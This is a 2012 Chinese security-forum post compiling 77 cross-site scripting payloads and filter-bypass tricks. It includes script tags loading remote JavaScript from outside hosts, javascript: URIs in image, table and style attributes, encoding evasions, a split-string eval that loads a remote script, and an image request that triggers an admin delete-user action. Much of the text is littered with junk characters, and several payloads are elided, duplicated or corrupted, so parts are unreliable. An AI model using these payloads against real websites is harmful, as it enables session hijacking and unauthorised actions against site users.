找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3467|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。0 ~6 D( ^* u* `0 F& d7 |' Q
* U/ y# y- Y! g- q  l% r, f; h
(1)普通的XSS JavaScript注入- ^: ]) _* z; k  |9 [
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* P9 Q; C) g) t- f5 D0 g' ~7 B; Q3 W1 V+ P2 ?: \, X  D
(2)IMG标签XSS使用JavaScript命令: r- [5 W0 l5 N
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 t, O9 M2 `" H5 B. X+ p. X+ q3 g# ?
(3)IMG标签无分号无引号
1 ^& K8 z( _0 Y! s1 D8 P" f <IMG SRC=javascript:alert(‘XSS’)>' \" G5 X! z! A2 `; x5 x. p% l4 O  ^

: ^" w9 ]3 @) ~9 |, e2 C  O (4)IMG标签大小写不敏感
! p$ B$ E# L8 _8 j <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
4 H1 @4 [0 I# H: C* l6 w: s
3 a  [. Z8 ]- `" s (5)HTML编码(必须有分号)
1 M' z" D2 }4 \, L- n# ^/ T2 [ <IMG SRC=javascript:alert(“XSS”)>2 @& `9 ]- L% M
, y( \* p4 ?" j& w. {7 @
(6)修正缺陷IMG标签
. W8 h' L! Q' }" x2 D <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>5 x- Z% A( @  V  V) L' j+ _
( i# a0 n* X7 S8 G8 [# P6 l
(7)formCharCode标签(计算器)
% V" O8 ]8 K" e# ?2 ] <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>6 \0 f8 e  t( t4 [! q! X
5 Z- {1 {& [8 \( \
(8)UTF-8的Unicode编码(计算器)% v, ]& S8 x+ M4 M# g" P6 X
<IMG SRC=jav..省略..S')>
. q% B3 P7 B8 m: |  b1 |; r3 r1 t- u8 e
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
' j+ B* M: _1 A! T2 I* P4 _ <IMG SRC=jav..省略..S')>
) A$ I* J; Y0 L' h
: {# p9 R( P( Z (10)十六进制编码也是没有分号(计算器)& i3 d& g! ?% ?
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>9 u0 ^  h6 ~( o5 |% h
; W7 d5 d! i6 e, i
(11)嵌入式标签,将Javascript分开
" q- ]6 b. Q! z0 I: | <IMG SRC=”jav ascript:alert(‘XSS’);”>1 @$ A7 g5 e  b/ i3 |

) y8 d  o7 u1 s, B/ u  n (12)嵌入式编码标签,将Javascript分开$ ?  W, {& S  d' j
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 Q- Q- V0 O+ I1 D6 M9 ^5 f% r
: I& U, m" U0 s# l7 }
(13)嵌入式换行符/ T; L: o! h1 ^- {. D; I
<IMG SRC=”jav ascript:alert(‘XSS’);”>( V: K( X" X# l# j1 G7 \2 A, d4 E

, X7 k  R' F' s/ d) u0 B" d (14)嵌入式回车
. Y8 H" y1 ~- u <IMG SRC=”jav ascript:alert(‘XSS’);”>8 d/ ^$ w3 r# Y& K8 j2 k2 \0 ]

8 a: u( c! J& m  @/ h8 y (15)嵌入式多行注入JavaScript,这是XSS极端的例子
3 M+ A" M, K0 {& f) Z <IMG SRC=”javascript:alert(‘XSS‘)”>6 S0 C  P: |" y9 o4 c. U  {$ B7 F
8 }& D2 x: W) }( g. S
(16)解决限制字符(要求同页面)$ x& M1 ?8 N' ^2 B  J
<script>z=’document.’</script>
" v0 }% i/ [) E0 n( ~9 | <script>z=z+’write(“‘</script>
& I2 Y* X) _! p7 ~* M9 t' P <script>z=z+’<script’</script>1 ~; h9 _( S! ^
<script>z=z+’ src=ht’</script>, n& x( Q* C4 g2 K1 n5 q; _0 f
<script>z=z+’tp://ww’</script>
8 ], @& t: @& r4 s, V <script>z=z+’w.shell’</script>9 D8 q) @1 n) ]6 u
<script>z=z+’.net/1.’</script>9 U- q9 ^$ Q  S1 I, Y% g9 Y" k: E
<script>z=z+’js></sc’</script>1 b9 e6 |1 b8 g
<script>z=z+’ript>”)’</script>
" L* J" v& U7 M# ~1 H" K <script>eval_r(z)</script>, y" G% O9 B( p6 l0 m' W8 j3 z& f

! d, @: z+ J; g- K  g; ?) B  l (17)空字符
/ H  l1 i( U! b& O+ a5 G4 } perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
' ~  J$ C; x, p# l$ k# G. A' K2 p! f" A
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用* U" I" l; n$ s! w. Y; [
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 J! N! x% ?6 r

6 }  p: p, }0 R. A2 h+ p5 x6 g  D' P (19)Spaces和meta前的IMG标签
& x. O: Z. b% m8 k <IMG SRC=”   javascript:alert(‘XSS’);”>
8 G6 G# R. X: B3 @- e- M9 ~( i6 E" q$ _# L/ o9 `
(20)Non-alpha-non-digit XSS
; c% X% \3 }0 M <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>& {) u" F& w  ~: R) n

. B" B+ w4 j" y! k7 X8 @7 z/ m  O5 o (21)Non-alpha-non-digit XSS to 25 F- h* J5 y4 J! G2 f
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>0 m  U6 o' b) @) n  Q# n. E
3 @3 [( x5 V4 P. Y# n: `& N
(22)Non-alpha-non-digit XSS to 3
( Y# S$ u) T. c3 x& n <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>3 q1 E6 K; ]7 x

% S) [# _1 W$ z0 o; S  z: w (23)双开括号4 `9 d5 V  `( a: F
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 ?% D. S8 A9 [& v; l" o
$ z4 m; E8 q6 |+ R4 I' ~$ ?! ? (24)无结束脚本标记(仅火狐等浏览器)
0 r0 A: q) `1 q6 n. t3 { <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
. s% i# x, D; J! ?  b, q) H# C3 |
  g( y" d0 M: }7 ~% c (25)无结束脚本标记2  y7 Z' i9 A! [; S: b, e
<SCRIPT SRC=//3w.org/XSS/xss.js>0 `2 q( X7 J& p- y. H6 D

7 s6 s% }% b& M" z2 W (26)半开的HTML/JavaScript XSS
3 e* U0 H: K) U! x$ R3 P' D <IMG SRC=”javascript:alert(‘XSS’)”; d: c9 L4 _8 m3 k( \2 u
! L8 l3 O9 g: I  {
(27)双开角括号6 S  Q/ w9 g5 A5 B2 Q) k
<iframe src=http://3w.org/XSS.html <
" l  Q/ B$ \  ~+ F- ~7 K- h3 ^& w$ r
(28)无单引号 双引号 分号4 D; z  w, h* Q" s$ _
<SCRIPT>a=/XSS/
" r& w9 q7 y6 P' Y' E3 u, b) m alert(a.source)</SCRIPT>
, H+ n% r  D7 t* X: l( ~' N' L, P9 E( h  |! X3 A. D
(29)换码过滤的JavaScript
. T* W; G( R3 ~1 t* o+ z \”;alert(‘XSS’);//
0 c8 ~+ j1 B% ^6 O" }- Y1 _! a
! @- ~3 k' K+ g9 }9 Z+ U5 [& o (30)结束Title标签- k( b5 C, L6 J3 F. X
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! [+ ]- q( M# E+ V* k* D
& \' m$ w! Q( h& R# j# y* i9 e
(31)Input Image1 N. T. T) y5 g8 |! a& M! h
<INPUT SRC=”javascript:alert(‘XSS’);”>3 }' D/ r; }4 g- M8 R/ K. o' F5 y
7 j1 d& u  g; a$ m
(32)BODY Image% a. t0 |4 ^; V9 T+ V
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>6 F' ^( |4 {) S2 u) q

# n; \) X) [/ U5 y (33)BODY标签
3 F4 q! `4 E( U- @ <BODY(‘XSS’)>
( _& `" E/ V! i! T- y2 p( E. x9 f- U: _( l3 x# G
(34)IMG Dynsrc
7 K( Y1 A3 s. b1 } <IMG DYNSRC=”javascript:alert(‘XSS’)”>& m' R8 l8 M: P) h$ r% W

, y$ B- J* ~0 Y) n2 S1 A (35)IMG Lowsrc
# ~, Q' l) S* |8 L: `4 p2 { <IMG LOWSRC=”javascript:alert(‘XSS’)”>: ]  |- Y) S  U$ T9 k" {3 i4 Z

' ^$ R. c' A8 _  Z4 N2 F& K0 P (36)BGSOUND- B+ g. f* d! f/ S
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
5 p* T. T- d  r/ R+ x9 t. r
8 L! t' @% @- x (37)STYLE sheet! a0 R& l/ M# {$ S, P* Q
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>% A9 H2 l+ a, [4 C( O& K; \" V& s+ n

2 L/ Q) Y  t, K. j# T1 j5 Y7 Y- ? (38)远程样式表/ @) T& X. I( I4 Z. _4 |
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
! V) D% G9 k- _1 ~) P
. F/ Q, _' V! v% p9 F! } (39)List-style-image(列表式)6 E  L; O7 G% b/ R
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS5 ?6 Q( P! w) e, t3 s! w- T3 l

  C' r1 w# }3 N! o (40)IMG VBscript2 U' H6 ~# M: s  `
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
9 E* t! \3 a* ^9 {' ?) ?- L& S; M# G7 g
(41)META链接url  Q# x0 [) F/ P( A. u, R
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>+ ]' q8 B8 G' d

7 w, i6 f4 S+ [ (42)Iframe
  t+ t, w: Z8 p' Z <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" q- t" J( ^; r! W9 K! O/ {2 A" u+ I6 i) V$ d+ P; E6 o1 c8 C; v' s
(43)Frame
/ l1 e6 l3 i1 p1 b. G* E" g) F <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
! o$ m; f: n! d) N( `5 T5 [3 |- {4 q
(44)Table
9 y0 z! N! g5 A <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>$ }) o1 ?- S4 N3 ]2 N0 m9 s5 i$ ~
2 a2 L  J# G" L& S5 L
(45)TD
) a3 a; q. P  q! C <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>  T9 u( O& c4 f7 ~9 B$ T

6 y  B: C1 w) ^" }1 j4 W7 q1 w (46)DIV background-image
. R% L4 @8 U( Z  [ <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- |; ]: X( h# S- [) t
! r& E. S+ t$ V" y4 p (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
0 r! T, h: \5 J& C0 t& w, O- r <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
! Q% P8 F" S0 Q: T0 w1 X5 F# S' e0 j% [, Q% J" o8 [3 q; L+ j% Y
(48)DIV expression
2 \( S6 _1 H& F) u6 c1 F/ _' k <DIV STYLE=”width: expression_r(alert(‘XSS’));”>  e. b- k- _+ x* t

" x) f1 n# e' w' Y8 w3 J (49)STYLE属性分拆表达' o/ P  x& w% u4 q( |
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
% X! Z- R, V; s7 y1 o
8 k1 N2 U( E. z  @9 ^! k  K (50)匿名STYLE(组成:开角号和一个字母开头)
8 m4 m: ^+ {7 v& r <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>: x5 Z$ E  e# S+ O" L/ b- C

8 Z; Q1 @0 f9 n' W' T/ E (51)STYLE background-image
& D& z' A7 _7 E* ~ <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
: w" N7 ]' Q4 [
2 u6 U( ~* _3 v" ]: ~7 T (52)IMG STYLE方式; t' r, [5 W, C( |) e8 ]1 n+ \
exppression(alert(“XSS”))’>  q1 {& j/ i8 ?: ^- Y) z6 g
; v) S( X/ N( r; |: C, k* ?* @4 N
(53)STYLE background( L# T2 e3 `) s' V8 c1 S. K$ l9 v
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>+ \+ g+ Q$ z  X( }

5 l& m9 S% K1 o0 V- _) E$ T (54)BASE
4 N) V- N9 @  v) }; T/ Q <BASE HREF=”javascript:alert(‘XSS’);//”>
! M) h; \& o' x/ ?- c& e+ S5 H( u: |9 y$ E
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
: ]! Y- r1 w6 s* h& e <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
7 W( |% I0 r, n/ J3 P4 c
1 Y6 `& k9 l- x9 i: ]' B& v  m (56)在flash中使用ActionScrpt可以混进你XSS的代码4 i9 s  V, T5 b4 u, z
a=”get”;
  X. x! L5 Q' K  R9 K- v b=”URL(\”";
! |! R  e/ g, Z, _7 } c=”javascript:”;/ s: S2 p/ m( j, _1 c. t0 u3 V
d=”alert(‘XSS’);\”)”;
, K4 X" t0 h( D# X& e. U eval_r(a+b+c+d);
6 ]- }6 l+ I* @8 B5 m( I2 R2 N+ s% e, D" a
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上2 y: Z  Q+ g! g0 C7 O6 m$ E! V
<HTML xmlns:xss>
! @0 D2 }2 z& p$ A( S <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>- G8 V. C: G6 D& N; z7 g8 z( p3 X# l6 P; z
<xss:xss>XSS</xss:xss>+ x3 }% A! P/ _" {
</HTML>& |# v2 J9 y8 ~7 u
" E$ O7 `; `* x  g; b
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
* d3 o& y6 d% K! v" H <SCRIPT SRC=””></SCRIPT>7 l7 k% y1 r9 M- p6 c$ n
4 Q0 {$ w9 Q9 ]/ T/ [
(59)IMG嵌入式命令,可执行任意命令6 C, H# `( O3 s: d
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
% w* Z# ~( P9 O2 {0 I
2 ~6 K1 n$ v/ T" w( E' Y (60)IMG嵌入式命令(a.jpg在同服务器)" p: g1 H/ e  s; R% f% F
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
0 ^) g& m# k! ?- ^# P! Y+ U$ [6 t( o9 d4 q" H; \+ ?
(61)绕符号过滤; v$ p" D2 M6 Q) c
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>3 f  I% n& l, E, q

" {9 B5 u! i  Y, v0 ?; Z9 V$ {! X (62)
+ x2 ~% P) a; J" H <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 g) d# Z' y) U
5 T4 ^5 L: ?+ c) Y& L; _' k (63)& ]& A0 R$ N+ V5 d9 Y" p
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
* ]; Y  O: n2 N6 S3 O. g0 P' S1 M1 _4 h* t! g0 Z+ {6 f
(64)& b4 F. ~, z+ j8 F$ `9 Z: E
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
% M1 e/ x7 v! H) _9 l) T* H+ @! u0 z* g$ U# D
(65)8 b# x8 h! C$ _: V
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>( X4 E. C  L! ^; l; o
+ j2 A1 p# T+ W; E
(66)( L" B6 S# O! _7 q
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
  [1 M: N+ B4 j0 V4 k( ]! y2 O
, ^- f9 X- I( n( n) J3 ] (67)
9 k- H& c, |0 U+ C$ q; {. K$ V5 a <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>: w* u5 h# A! N6 u* t. M

' r2 b$ P$ V8 f( V+ i' @$ [ (68)URL绕行
6 E$ d8 u) H* ]; U* D: E( C <A HREF=”http://127.0.0.1/”>XSS</A>
4 J( e  l* s: L; `' w/ W5 L2 E1 k2 ?5 ?
(69)URL编码
; m9 D& P- X2 W+ v4 p3 B4 }; P2 c <A HREF=”http://3w.org”>XSS</A>
4 p* c. N6 |; ~0 b! T, h: i4 G# i: W% y
(70)IP十进制# Y7 |4 F* K0 b9 A
<A HREF=”http://3232235521″>XSS</A>/ |! d- {8 D1 u# E: _
7 k# F; q" o# R# K! j! ?
(71)IP十六进制
0 e$ M! s5 f# ~. X! \) h <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>6 g+ }2 \* S7 o: I- g
2 u6 r* f, a# l) X2 t1 d, I
(72)IP八进制3 o6 @& J! A* e$ @
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
+ T0 }2 j! n5 `# H
5 d/ ^7 ~; N& s- R  I& c) {8 c6 W8 N (73)混合编码
1 G2 o% L$ B' v <A HREF=”h2 Z; x' d' o. @3 i( `. Y
tt p://6 6.000146.0×7.147/”">XSS</A>
& F$ l9 D; ~' i0 y4 M  E; m
2 ?6 G! _  r. q/ }- ~% B# T: k (74)节省[http:]% S% d: X. B3 n3 j
<A HREF=”//www.google.com/”>XSS</A>6 q9 Q, T8 u/ C) j7 M$ H

/ N: V2 h# B2 P5 r8 M; g8 _6 J/ G% y (75)节省[www]
1 Q! {! j% e# e% h9 [7 a! j9 M <A HREF=”http://google.com/”>XSS</A>; m' |7 M$ }, t, c( ?
$ E4 n" M7 m2 I6 I: j/ D
(76)绝对点绝对DNS
6 n1 R; m+ N. i4 F <A HREF=”http://www.google.com./”>XSS</A>
$ A" x' K. N# |7 t/ |, H$ w1 e8 Z4 ^3 [  W8 N3 |( p
(77)javascript链接
5 q% k+ k% H( L4 I  Q <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表